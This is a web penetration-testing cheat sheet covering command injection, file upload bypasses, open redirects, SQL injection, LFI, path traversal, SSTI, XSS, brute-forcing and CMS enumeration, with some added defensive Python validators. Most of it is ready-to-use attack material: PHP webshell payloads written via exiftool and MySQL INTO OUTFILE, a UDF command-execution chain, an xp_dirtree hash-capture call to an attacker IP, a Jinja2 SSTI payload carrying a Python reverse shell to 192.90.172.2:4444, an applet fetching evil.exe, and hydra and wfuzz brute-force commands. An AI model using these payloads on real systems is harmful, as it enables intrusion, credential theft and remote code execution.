Web

Vulnerabilities

Command Injection

Bypass

w\h\o\a\m\i
\w\h\o\a\m\i
'html', 'htm', 'js', 'jsb', 'mhtml', 'mht',
'php', 'phtml', 'php3', 'php4', 'php5', 'phps',
'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd',
'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'
Tools

CRLF

Tools

Payloads

CSRF

Tools

File Upload

Bypass

  • Null byte: %00 to truncate the stored file name past a checked extension (wpes.php%00.png)
  • Suffix the file name with % (example.php%)
  • Double extensions: wpes.png.php, valid.txt.php
  • Altering the Content-Type header
  • Magic number: prepend a valid file header (example for GIF: GIF89a;)
  • Code in an image comment (PHP tags inside EXIF metadata survive image-header checks):
    • exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' lo.jpg

Alternative Extensions

  • PHP - pht, phpt, phtml, php3, php4, php5, php6, php7
  • CFM - cfml, cfc, dbm
  • ASP - aspx
  • Perl - pl, pm, cgi, lib
  • JSP - jspx, jsw, jsv, jspf
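A server-side upload check that closes every bypass listed above (null byte, trailing %, double extensions, the alternative extensions, Content-Type spoofing and the magic-number trick). This is an added example, not code from the original notes; the allow-listed image types and their magic numbers are assumptions for a hypothetical image-upload endpoint.

```python
import re
from typing import Tuple

# Script extensions from the lists above. Every dot-separated segment of the
# name is checked, so wpes.png.php, valid.txt.php and evil.php.png all fail.
EXECUTABLE_EXTENSIONS = {
    "php", "pht", "phpt", "phtml", "php3", "php4", "php5", "php6", "php7", "phps",
    "cfm", "cfml", "cfc", "dbm", "asp", "aspx", "pl", "pm", "cgi", "lib",
    "jsp", "jspx", "jsw", "jsv", "jspf", "shtml", "jhtml", "py", "sh", "htaccess",
}
# Assumed allow-list for the endpoint, with the leading bytes each type must
# carry. The client-supplied Content-Type header is never consulted.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for an uploaded file name and its bytes."""
    # Raw NUL or %00 and a trailing '%' are the truncation tricks listed above.
    if "\x00" in filename or "%00" in filename.lower():
        return False, "null byte in filename"
    if filename.endswith("%"):
        return False, "trailing percent in filename"
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,64}", filename):
        return False, "unexpected characters in filename"
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return False, "executable extension in filename"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match declared image type"
    # A correct header does not prove the file is harmless: a payload in an
    # EXIF comment (see exiftool above) passes this check, so uploads must also
    # be re-encoded and served from a location where nothing is executed.
    return True, "ok"
```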

Open Redirect

Scenarios

  • Grab tokens via mis-configured apps/login flows
  • Bypassing blacklists for SSRF/RCE
  • XSS via "location.href = 'javascript:alert(0)1'"
  • Taking advantage of fileuploads and mobile devices

Bypasses

https%3A%2F%2Fmysite.com%2F
https%3A%2F%2Fexample.com%2F%3Freturnurl%3D%2F%2Fmysite.com%2F
\/yoururl.com
\/\/yoururl.com
\\yoururl.com
//yoururl.com
//theirsite@yoursite.com
https://yoursite?c=.theirsite.com/
https://yoursite.com#.theirsite.com/
https://yoursite.com\.theirsite.com/
//%2F/yoursite.com
////yoursite.com
https://theirsite.computer/ - (if they just check for *theirsite.com*, .computer is a valid TLD!)
https://theirsite.com.mysite.com - (treat their domain as a subdomain of yours)
/%0D/yoursite.com - (also try %09, %00, %0a, %07)
java%0d%0ascript%0d%0a:alert(0), j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0` ,java%07script:prompt`0` ,java%09scrip%07t:prompt`0`
https://www.bugbountynotes.com/training/tutorial?id=1
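The bypass list above is what a redirect validator has to survive: scheme-relative `//` forms, backslashes, userinfo `@`, substring matches on the host, control characters and (double) percent-encoding. The validator below is an added example written for these notes, not code from the original page; the allow-listed hosts are an assumption for a hypothetical application.

```python
from urllib.parse import urlsplit, unquote

ALLOWED_HOSTS = {"example.com", "www.example.com"}  # assumed: the app's own hosts

def _fully_decoded(value: str, rounds: int = 3) -> str:
    # Undo repeated percent-encoding (https%3A%2F%2F..., %252F) so the check
    # sees the same string a browser or a later decoder would act on.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def safe_redirect_target(value: str) -> str:
    """Return the redirect target to use, or '/' when the value is not safe."""
    decoded = _fully_decoded(value)
    # Control characters, whitespace and backslashes cover the %0d/%0a/%09/%07/%00
    # tricks and the '\/' and '\\' forms that browsers read as '//'.
    if any(c < " " or c == "\x7f" or c == "\\" for c in decoded):
        return "/"
    try:
        parts = urlsplit(decoded)
    except ValueError:          # malformed netloc such as an unbalanced '['
        return "/"
    if parts.scheme == "" and parts.netloc == "":
        # Relative path: exactly one leading '/', so '//host', '////host' and
        # the decoded form of '/%2F/host' are all rejected.
        if decoded.startswith("/") and not decoded.startswith("//"):
            return decoded
        return "/"
    if parts.scheme not in ("http", "https"):
        return "/"              # javascript:, data: and friends
    if "@" in parts.netloc:
        return "/"              # //theirsite@yoursite.com
    host = (parts.hostname or "").rstrip(".")
    if host not in ALLOWED_HOSTS:   # exact match, never a substring or suffix test
        return "/"
    # A nested returnurl= on our own host is checked again on that request.
    return decoded
```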

SSRF

Tools

SQL Injection

Tools

Payload

  • Combines blind command injection and blind sql injection (mysql) in one payload (works with no quotes/single quotes and double quotes):
  • WebShell over MySQL: SELECT '<?php echo shell_exec($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/example.php'
  • User Defined Functions (UDF) (sqlmap/udf/mysql)
    SELECT @@plugin_dir;
    PowerShell$ Convert-Dll -DllPath lib_mysqludf_sys.dll -OutputPath bytes.txt
    SELECT CHAR(64,64,....) INTO OUTFILE '<@@plugin_dir>/lib_mysqludf_sys.dll' FIELDS ESCAPED BY '';
    CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll';
    SELECT sys_eval('whoami');
    
  • Simple payloads:
    ' or 1=1 LIMIT 1 --
    ' or 1=1 LIMIT 1 -- -
    ' or 1=1 LIMIT 1#
    'or 1#
    ' or 1=1 --
    ' or 1=1 -- -
    
  • Order by to get column count: 1337 order by N
  • Read file: LOAD_FILE('/etc/passwd')
  • Read from information schema:
    union select 1,2,group_concat(distinct table_schema separator ',') from information_schema.tables LIMIT 1,1
    union select 1,2,group_concat(distinct table_name separator ',') from information_schema.tables where table_schema = 'security' LIMIT 1,1
    
  • Write to file: select 1,2,3,4,"<?php echo system($_GET['cmd']); ?>",6 INTO OUTFILE 'C:\htdocs\webroot\shell.php'
  • SQL Server
    • Run Responder and do the following to capture hashes: EXEC master..xp_dirtree '\\(ATTACKER IP ADDRESS)\foo'--
    • Add a trigger to perform a malicious action (e.g. set price to 0)

Language Specific

Practice

LFI / RFI

Payloads

  • including uploaded files
  • including data:// or php://input, php://filter pseudo protocols
  • including logs
  • including /proc/self/environ
  • including session files (usually named /tmp/sess_SESSIONID)
  • including other files created by the PHP application
  • including PHP's temporary upload files C:\Windows\Temp\php<16-bit-random>.TMP; the random part need not be brute-forced, the Windows short-name wildcard inc=C:\Windows\Temp\php<< matches them

LFI to RCE

  • RCE with TXT upload
    • Expose a .txt file and use a vulnerable include to pull the txt file into executed code (evil.txt.php).
    • PHP configuration can disable URL file access (allow_url_fopen / allow_url_include), but local files can still be included.
  • RCE with logs
    • Use nc to write malicious content into the access log.
    • Connect and just send the attack string (in the User-Agent header etc.).
    • Then include the log file (local file inclusion).
  • RCE over SQLi
    • Return <?php echo "test"?> from SQL and check the result to see whether RCE over SQLi is possible.

PHP Wrappers

  • File upload with POST data
    • curl -s --data "<?system('ls -la');?>" "http://target.host/web.php?file_path=php://input%00"
  • Base64 encode the LFI
    • http://X.X.X.X/?page=php://filter/convert.base64-encode/resource=(PHP FILE NAME NO EXTENSION)

Path Traversal

Payloads

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
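Each payload above targets a different weakness in a path check: a naive `../` substring filter (`..././`, `...\.\`), missing backslash handling (`..\`), single-pass decoding (`%252e`), and decoders that accept overlong UTF-8 or `%u` encodings. The check below is an added example for these notes, not code from the original page; it canonicalises the final path instead of filtering substrings. The base directory is an assumption.

```python
import os
from typing import Optional
from urllib.parse import unquote

def resolve_under(base_dir: str, requested: str) -> Optional[str]:
    """Map a user-supplied relative path to a file under base_dir.

    Returns the canonical absolute path, or None when the request escapes
    base_dir or uses one of the encoding tricks from the payload list above.
    """
    decoded = requested
    for _ in range(3):                          # %252e%252e%252f needs two passes
        try:
            nxt = unquote(decoded, errors="strict")
        except UnicodeDecodeError:
            return None                         # overlong UTF-8: %c0%ae%c0%ae%c0%af
        if nxt == decoded:
            break
        decoded = nxt
    # %uff0e / %u2215 are not valid percent-encoding and survive unquote();
    # a NUL would truncate the path in C-based file APIs.
    if "%" in decoded or "\x00" in decoded:
        return None
    # Treat backslash as a separator so ..\ and ..\/ cannot slip past as "safe".
    decoded = decoded.replace("\\", "/")
    base_real = os.path.realpath(base_dir)
    # Nothing is stripped from the string, so ..././ names a directory called
    # "..." inside base_dir instead of collapsing to ../ after a filter.
    target = os.path.realpath(os.path.join(base_real, decoded.lstrip("/")))
    # Compare whole path components: a plain prefix test would let a sibling
    # directory such as /srv/www/files-old through.
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target
```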

Server Side Template Injection (SSTI)

  • Payloads:
    • Jinja2
      {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']}}{%endif%}{% endfor%}
      
      {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.90.172.2\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\"]);'")}}{%endif%}{% endfor %}
      

Client Side Attacks

XSS

Tools

Payloads

Applet

javac Java.java
echo "Permissions: all-permissions" > /root/manifest.txt
jar cvf Java.jar Java.class
    added manifest
    adding: Java.class(in = 1233) (out= 709)(deflated 42%)

keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123

jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet

echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"><param name="1" value="http://192.168.10.5:80/evil.exe"></applet>' > /var/www/java.html

Other

Other

Scenarios

Techniques

Discovery and Enumeration

WAF Bypasses

SSL /TLS Attacks

Brute-forcing

POST

hydra -l (USERNAME) -P /path/to/wordlist.txt (TARGET IP ADDRESS) \
  http-post-form "/URI/path/to/login.php:(HTML FORM USERNAME ATTRIBUTE)=^USER^&(HTML FORM PASSWORD ATTRIBUTE)=^PASS^&Login=Login:(FAILED LOGIN MESSAGE)"

GET

hydra -l admin -P /pwnt/passwords/wordlists/rockyou.txt (TARGET IP ADDRESS) \
  http-get-form "/login.php:username=^USER^&password=^PASS^&Login=Login:Please Login|Bad Request"

Fuzzing

Cookies

wfuzz -z \
 file,/infosec/SecLists/Passwords/Common-Credentials/10-million-password-list-top-500.txt \
 -b passwd=FUZZ http://(TARGET IP ADDRESS):(TARGET PORT)

Defense

CMS

Drupal

Wordpress

  • Version discovery
    curl -s 192.168.56.102/wordpress/ | grep generator
    curl -s 192.168.56.102/wordpress/readme.html | grep Version
    curl -s 192.168.56.102/wordpress/wp-login.php | grep "ver="
    
  • User enumeration
    for i in $(seq 1 5); do curl -sL 192.168.110.105/wordpress/?author=$i | grep '<title>'; done
    
    # When the 'stop-user-enumeration' plugin is installed
    curl -i -sL '192.168.56.102/wordpress/?wp-comments-post&author=1' | grep '<title>'
    curl -sL 192.168.56.102/wordpress/?wp-comments-post -d author=1 | grep '<title>'
    
    # REST API (WordPress 4.7+)
    curl -s http://localhost/wp-json/wp/v2/users
    
  • Theme and plugin enumeration
    • /wordpress_site/wp-content/plugins/
    • /wordpress_site/wp-content/themes/
      wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt --hc 404 192.168.56.104/wordpress/FUZZ
      nmap -sV -p 80 192.168.56.102 --script=http-wordpress-enum.nse --script-args=http-wordpress-enum.root=/wordpress/
      
  • Enumerate users, plugins and themes
    wpscan -u http://192.168.110.105/wordpress/ -e u,ap,at
    

Joomla

Moodle

SilverStripe

Sharepoint

  • Important files:
    • /_layouts/viewlsts.aspx

Tools

  • BurpSuite
  • ADAPT is a tool that performs automated penetration testing for web apps: https://github.com/secdec/adapt
    • OTG-IDENT-004 - Account Enumeration
    • OTG-AUTHN-001 - Testing for Credentials Transported over an Encrypted Channel
    • OTG-AUTHN-002 - Default Credentials
    • OTG-AUTHN-003 - Testing for Weak Lock Out Mechanism
    • OTG-AUTHZ-001 - Directory Traversal
    • OTG-CONFIG-002 - Test Application Platform Configuration
    • OTG-CONFIG-006 - Test HTTP Methods
    • OTG-CRYPST-001 - Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection
    • OTG-CRYPST-002 - Testing for Padding Oracle
    • OTG-ERR-001 - Testing for Error Code
    • OTG-ERR-002 - Testing for Stack Traces
    • OTG-INFO-002 - Fingerprinting the Webserver
    • OTG-INPVAL-001 - Testing for Reflected Cross Site Scripting
    • OTG-INPVAL-002 - Testing for Stored Cross Site Scripting
    • OTG-INPVAL-003 - HTTP Verb Tampering
    • OTG-SESS-001 - Testing for Session Management Schema
    • OTG-SESS-002 - Cookie Attributes
    
  • Hawkeye - Project security, vulnerability and general risk highlighting tool: https://github.com/hawkeyesec/scanner-cli
  • Adobe Experience Manager (AEM) hacker toolset: https://github.com/0ang3el/aem-hacker

Practice

  • Login, registration, change password, change email, confirmation of email update

Pending References